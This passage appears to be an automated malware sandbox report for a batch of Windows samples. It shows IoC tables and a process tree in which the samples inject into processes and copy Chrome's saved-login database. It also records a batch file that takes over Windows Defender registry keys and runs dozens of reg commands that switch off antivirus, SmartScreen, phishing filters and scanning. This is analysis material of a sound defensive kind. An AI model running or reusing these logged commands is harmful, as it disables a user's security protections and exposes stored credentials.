Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

7zG.exe7zG.exe0f9b1a70b9f5dae682e68e8f0b01f3268013721d4d4fbff9d128268a511f775d.exe

pid process

4540 7zG.exe
572 7zG.exe
4920 0f9b1a70b9f5dae682e68e8f0b01f3268013721d4d4fbff9d128268a511f775d.exe

pid	process
4540	7zG.exe
572	7zG.exe
4920	0f9b1a70b9f5dae682e68e8f0b01f3268013721d4d4fbff9d128268a511f775d.exe

Suspicious use of SetWindowsHookEx 57 IoCs

Processes:

Explorer.EXE0f9b1a70b9f5dae682e68e8f0b01f3268013721d4d4fbff9d128268a511f775d.exeIBInstaller_98220.exeIBInstaller_98220.tmpsetup.execmd.exeConhost.exeSetACL32.exeSetACL32.exeSetACL32.exereg.exereg.exereg.exereg.exePowerRun.exereg.exePowerRun.exePowerRun64.exePowerRun.exePowerRun.exePowerRun.exePowerRun.exePowerRun64.exePowerRun.exePowerRun.exePowerRun.exePowerRun64.exePowerRun.exePowerRun.exetaskmgr.exePowerRun.exePowerRun.exePowerRun.exereg.exeWerFault.exePowerRun.exePowerRun.exe

pid	process
3108	Explorer.EXE
3108	Explorer.EXE
3108	Explorer.EXE
3108	Explorer.EXE
3108	Explorer.EXE
3108	Explorer.EXE
3108	Explorer.EXE
3108	Explorer.EXE
3108	Explorer.EXE
3108	Explorer.EXE
4920	0f9b1a70b9f5dae682e68e8f0b01f3268013721d4d4fbff9d128268a511f775d.exe
656	IBInstaller_98220.exe
2620	IBInstaller_98220.tmp
1664	setup.exe
184	cmd.exe
3956	Conhost.exe
4824	SetACL32.exe
1796	SetACL32.exe
3760	SetACL32.exe
3000	reg.exe
4932	reg.exe
2920	reg.exe
3108	Explorer.EXE
3108	Explorer.EXE
2020	reg.exe
1828	PowerRun.exe
4600	reg.exe
1788	PowerRun.exe
3600	PowerRun64.exe
3108	Explorer.EXE
3108	Explorer.EXE
436	PowerRun.exe
3328	PowerRun.exe
5040	PowerRun.exe
4332	PowerRun.exe
4272	PowerRun64.exe
220	PowerRun.exe
2216	PowerRun.exe
1744	PowerRun.exe
4576	PowerRun64.exe
2300	PowerRun.exe
4256	PowerRun.exe
3108	Explorer.EXE
3108	Explorer.EXE
3872	taskmgr.exe
1780	PowerRun.exe
3108	Explorer.EXE
3108	Explorer.EXE
4000	PowerRun.exe
4048	PowerRun.exe
4496	reg.exe
1116	WerFault.exe
3856	PowerRun.exe
1800	PowerRun.exe
3108	Explorer.EXE
3108	Explorer.EXE
2132

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

0be395d43c98fe7b2d0fff10863410665ee11ce31a10277dc03049e77661b1ca.exejazvc.exeExplorer.EXEhelp.exe0f9b1a70b9f5dae682e68e8f0b01f3268013721d4d4fbff9d128268a511f775d.exeIBInstaller_98220.exesetup.execmd.exe

description	pid	process	target process
PID 4024 wrote to memory of 4276	4024	0be395d43c98fe7b2d0fff10863410665ee11ce31a10277dc03049e77661b1ca.exe	jazvc.exe
PID 4024 wrote to memory of 4276	4024	0be395d43c98fe7b2d0fff10863410665ee11ce31a10277dc03049e77661b1ca.exe	jazvc.exe
PID 4024 wrote to memory of 4276	4024	0be395d43c98fe7b2d0fff10863410665ee11ce31a10277dc03049e77661b1ca.exe	jazvc.exe
PID 4276 wrote to memory of 1708	4276	jazvc.exe	jazvc.exe
PID 4276 wrote to memory of 1708	4276	jazvc.exe	jazvc.exe
PID 4276 wrote to memory of 1708	4276	jazvc.exe	jazvc.exe
PID 4276 wrote to memory of 1708	4276	jazvc.exe	jazvc.exe
PID 3108 wrote to memory of 4640	3108	Explorer.EXE	help.exe
PID 3108 wrote to memory of 4640	3108	Explorer.EXE	help.exe
PID 3108 wrote to memory of 4640	3108	Explorer.EXE	help.exe
PID 4640 wrote to memory of 2408	4640	help.exe	cmd.exe
PID 4640 wrote to memory of 2408	4640	help.exe	cmd.exe
PID 4640 wrote to memory of 2408	4640	help.exe	cmd.exe
PID 3108 wrote to memory of 4920	3108	Explorer.EXE	0f9b1a70b9f5dae682e68e8f0b01f3268013721d4d4fbff9d128268a511f775d.exe
PID 3108 wrote to memory of 4920	3108	Explorer.EXE	0f9b1a70b9f5dae682e68e8f0b01f3268013721d4d4fbff9d128268a511f775d.exe
PID 3108 wrote to memory of 4920	3108	Explorer.EXE	0f9b1a70b9f5dae682e68e8f0b01f3268013721d4d4fbff9d128268a511f775d.exe
PID 4920 wrote to memory of 656	4920	0f9b1a70b9f5dae682e68e8f0b01f3268013721d4d4fbff9d128268a511f775d.exe	IBInstaller_98220.exe
PID 4920 wrote to memory of 656	4920	0f9b1a70b9f5dae682e68e8f0b01f3268013721d4d4fbff9d128268a511f775d.exe	IBInstaller_98220.exe
PID 4920 wrote to memory of 656	4920	0f9b1a70b9f5dae682e68e8f0b01f3268013721d4d4fbff9d128268a511f775d.exe	IBInstaller_98220.exe
PID 656 wrote to memory of 2620	656	IBInstaller_98220.exe	IBInstaller_98220.tmp
PID 656 wrote to memory of 2620	656	IBInstaller_98220.exe	IBInstaller_98220.tmp
PID 656 wrote to memory of 2620	656	IBInstaller_98220.exe	IBInstaller_98220.tmp
PID 4920 wrote to memory of 1664	4920	0f9b1a70b9f5dae682e68e8f0b01f3268013721d4d4fbff9d128268a511f775d.exe	setup.exe
PID 4920 wrote to memory of 1664	4920	0f9b1a70b9f5dae682e68e8f0b01f3268013721d4d4fbff9d128268a511f775d.exe	setup.exe
PID 4920 wrote to memory of 1664	4920	0f9b1a70b9f5dae682e68e8f0b01f3268013721d4d4fbff9d128268a511f775d.exe	setup.exe
PID 1664 wrote to memory of 4748	1664	setup.exe	cmd.exe
PID 1664 wrote to memory of 4748	1664	setup.exe	cmd.exe
PID 1664 wrote to memory of 4748	1664	setup.exe	cmd.exe
PID 3108 wrote to memory of 4088	3108	Explorer.EXE	reg.exe
PID 3108 wrote to memory of 4088	3108	Explorer.EXE	reg.exe
PID 3108 wrote to memory of 4088	3108	Explorer.EXE	reg.exe
PID 4748 wrote to memory of 184	4748	cmd.exe	cmd.exe
PID 4748 wrote to memory of 184	4748	cmd.exe	cmd.exe
PID 4748 wrote to memory of 184	4748	cmd.exe	cmd.exe
PID 4748 wrote to memory of 3956	4748	cmd.exe	Conhost.exe
PID 4748 wrote to memory of 3956	4748	cmd.exe	Conhost.exe
PID 4748 wrote to memory of 3956	4748	cmd.exe	Conhost.exe
PID 4748 wrote to memory of 4824	4748	cmd.exe	SetACL32.exe
PID 4748 wrote to memory of 4824	4748	cmd.exe	SetACL32.exe
PID 4748 wrote to memory of 4824	4748	cmd.exe	SetACL32.exe
PID 4748 wrote to memory of 1796	4748	cmd.exe	SetACL32.exe
PID 4748 wrote to memory of 1796	4748	cmd.exe	SetACL32.exe
PID 4748 wrote to memory of 1796	4748	cmd.exe	SetACL32.exe
PID 4748 wrote to memory of 3760	4748	cmd.exe	SetACL32.exe
PID 4748 wrote to memory of 3760	4748	cmd.exe	SetACL32.exe
PID 4748 wrote to memory of 3760	4748	cmd.exe	SetACL32.exe
PID 4748 wrote to memory of 3000	4748	cmd.exe	reg.exe
PID 4748 wrote to memory of 3000	4748	cmd.exe	reg.exe
PID 4748 wrote to memory of 3000	4748	cmd.exe	reg.exe
PID 4748 wrote to memory of 4932	4748	cmd.exe	reg.exe
PID 4748 wrote to memory of 4932	4748	cmd.exe	reg.exe
PID 4748 wrote to memory of 4932	4748	cmd.exe	reg.exe
PID 4748 wrote to memory of 2920	4748	cmd.exe	reg.exe
PID 4748 wrote to memory of 2920	4748	cmd.exe	reg.exe
PID 4748 wrote to memory of 2920	4748	cmd.exe	reg.exe
PID 4748 wrote to memory of 4260	4748	cmd.exe	PowerRun.exe
PID 4748 wrote to memory of 4260	4748	cmd.exe	PowerRun.exe
PID 4748 wrote to memory of 4260	4748	cmd.exe	PowerRun.exe
PID 4748 wrote to memory of 5020	4748	cmd.exe	PowerRun.exe
PID 4748 wrote to memory of 5020	4748	cmd.exe	PowerRun.exe
PID 4748 wrote to memory of 5020	4748	cmd.exe	PowerRun.exe
PID 4748 wrote to memory of 4448	4748	cmd.exe	reg.exe
PID 4748 wrote to memory of 4448	4748	cmd.exe	reg.exe
PID 4748 wrote to memory of 4448	4748	cmd.exe	reg.exe

C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\2022-10-24.zip
1⤵
PID:3620

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3108

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\2022-10-24\" -spe -an -ai#7zMap25196:78:7zEvent21347
2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4540

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\2022-10-24\" -spe -an -ai#7zMap27125:78:7zEvent26685
2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:572

C:\Users\Admin\Desktop\2022-10-24\0bea9e772ca21798cb2eaaf2ad5d05e403b8182756be5f74ac83dd25f2d8dacf.exe
"C:\Users\Admin\Desktop\2022-10-24\0bea9e772ca21798cb2eaaf2ad5d05e403b8182756be5f74ac83dd25f2d8dacf.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4052

C:\Users\Admin\Desktop\2022-10-24\0c1e5acd77d667335c59b10f7bd08997ff5bac4aeb52722fffe17c60d1779553.exe
"C:\Users\Admin\Desktop\2022-10-24\0c1e5acd77d667335c59b10f7bd08997ff5bac4aeb52722fffe17c60d1779553.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4572

C:\Users\Admin\Desktop\2022-10-24\0be395d43c98fe7b2d0fff10863410665ee11ce31a10277dc03049e77661b1ca.exe
"C:\Users\Admin\Desktop\2022-10-24\0be395d43c98fe7b2d0fff10863410665ee11ce31a10277dc03049e77661b1ca.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4024

C:\Users\Admin\AppData\Local\Temp\jazvc.exe
"C:\Users\Admin\AppData\Local\Temp\jazvc.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4276

C:\Users\Admin\AppData\Local\Temp\jazvc.exe
"C:\Users\Admin\AppData\Local\Temp\jazvc.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:1708

C:\Windows\SysWOW64\help.exe
"C:\Windows\SysWOW64\help.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4640

C:\Windows\SysWOW64\cmd.exe
/c del "C:\Users\Admin\AppData\Local\Temp\jazvc.exe"
3⤵
PID:2408

C:\Windows\SysWOW64\cmd.exe
/c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V
3⤵
PID:9468

C:\Program Files\Mozilla Firefox\Firefox.exe
"C:\Program Files\Mozilla Firefox\Firefox.exe"
3⤵
PID:6480

C:\Users\Admin\Desktop\2022-10-24\0f9b1a70b9f5dae682e68e8f0b01f3268013721d4d4fbff9d128268a511f775d.exe
"C:\Users\Admin\Desktop\2022-10-24\0f9b1a70b9f5dae682e68e8f0b01f3268013721d4d4fbff9d128268a511f775d.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4920

C:\Users\Admin\AppData\Local\Temp\nsy300B.tmp\IBInstaller_98220.exe
"C:\Users\Admin\AppData\Local\Temp\nsy300B.tmp\IBInstaller_98220.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs98220 -token mtn1co3fo4gs5vwq -subid 1878
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:656

C:\Users\Admin\AppData\Local\Temp\is-CJ2F1.tmp\IBInstaller_98220.tmp
"C:\Users\Admin\AppData\Local\Temp\is-CJ2F1.tmp\IBInstaller_98220.tmp" /SL5="$80320,9912121,832512,C:\Users\Admin\AppData\Local\Temp\nsy300B.tmp\IBInstaller_98220.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs98220 -token mtn1co3fo4gs5vwq -subid 1878
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:2620

C:\Users\Admin\AppData\Local\Temp\nsy300B.tmp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\nsy300B.tmp\setup.exe" 991878
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1664

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\do32.bat
4⤵
- Suspicious use of WriteProcessMemory
PID:4748

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\SetACL32.exe
SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"
5⤵
PID:184

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\SetACL32.exe
SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"
5⤵
PID:3956

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\SetACL32.exe
SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4824

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\SetACL32.exe
SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1796

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\SetACL32.exe
SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3760

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\SetACL32.exe
SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"
5⤵
PID:3000

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\SetACL32.exe
SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"
5⤵
PID:4932

C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\SetACL32.exe
SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"
5⤵
PID:2920

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f
5⤵
PID:4260

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f
5⤵
PID:5020

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f
5⤵
PID:4448

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f
5⤵
PID:1168

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f
5⤵
PID:2716

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f
5⤵
PID:3688

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f
5⤵
PID:2572

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f
5⤵
PID:4048

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f
5⤵
PID:3600

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f
5⤵
PID:684

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
5⤵
PID:1424

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
5⤵
PID:4356

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
5⤵
PID:2828

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
5⤵
PID:4304

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
5⤵
PID:2948

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f
5⤵
PID:4200

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
5⤵
PID:368

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
5⤵
PID:572

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
5⤵
PID:436

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
5⤵
PID:1660

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
5⤵
PID:4596

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f
5⤵
PID:4312

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f
5⤵
PID:3888

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f
5⤵
PID:4232

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f
5⤵
PID:4736

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f
5⤵
PID:2508

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f
5⤵
PID:5016

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f
5⤵
PID:1608

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f
5⤵
PID:2736

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
5⤵
PID:3856

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "LocalSettingOverridePurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
5⤵
PID:2388

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t reg_DWORD /d "1" /f
5⤵
- Modifies Windows Defender Real-time Protection settings
PID:3324

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t reg_DWORD /d "1" /f
5⤵
PID:2252

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t reg_DWORD /d "1" /f
5⤵
- Modifies Windows Defender Real-time Protection settings
PID:3628

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t reg_DWORD /d "1" /f
5⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4932

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t reg_DWORD /d "1" /f
5⤵
- Modifies Windows Defender Real-time Protection settings
PID:5044

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScriptScanning" /t reg_DWORD /d "1" /f
5⤵
- Modifies Windows Defender Real-time Protection settings
PID:4248

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t reg_DWORD /d "1" /f
5⤵
- Modifies Windows Defender Real-time Protection settings
PID:3792

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleDay" /t reg_DWORD /d "8" /f
5⤵
PID:3560

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleTime" /t reg_DWORD /d 0 /f
5⤵
PID:3092

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "AdditionalActionTimeOut" /t reg_DWORD /d 0 /f
5⤵
- Executes dropped EXE
PID:4088

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "CriticalFailureTimeOut" /t reg_DWORD /d 0 /f
5⤵
PID:5096

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "NonCriticalTimeOut" /t reg_DWORD /d 0 /f
5⤵
PID:1236

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableGenericRePorts" /t reg_DWORD /d 1 /f
5⤵
PID:3404

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f
5⤵
PID:1892

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "AvgCPULoadFactor" /t reg_DWORD /d "10" /f
5⤵
PID:3336

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableArchiveScanning" /t reg_DWORD /d "1" /f
5⤵
PID:3116

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupFullScan" /t reg_DWORD /d "1" /f
5⤵
PID:1904

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupQuickScan" /t reg_DWORD /d "1" /f
5⤵
PID:2136

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRemovableDriveScanning" /t reg_DWORD /d "1" /f
5⤵
PID:1284

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRestorePoint" /t reg_DWORD /d "1" /f
5⤵
PID:3120

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningMappedNetworkDrivesForFullScan" /t reg_DWORD /d "1" /f
5⤵
PID:4580

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningNetworkFiles" /t reg_DWORD /d "1" /f
5⤵
PID:2416

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleDay" /t reg_DWORD /d 8 /f
5⤵
PID:4132

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "PurgeItemsAfterDelay" /t reg_DWORD /d 0 /f
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2920

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleTime" /t reg_DWORD /d 0 /f
5⤵
PID:4332

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanOnlyIfIdle" /t reg_DWORD /d 0 /f
5⤵
PID:2168

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanParameters" /t reg_DWORD /d 0 /f
5⤵
PID:4228

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v "FirstAuGracePeriod" /t reg_DWORD /d "0" /f
5⤵
PID:4544

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "DisableUpdateOnStartupWithoutEngine" /t reg_DWORD /d 1 /f
5⤵
PID:1792

C:\Windows\SysWOW64\reg.exe
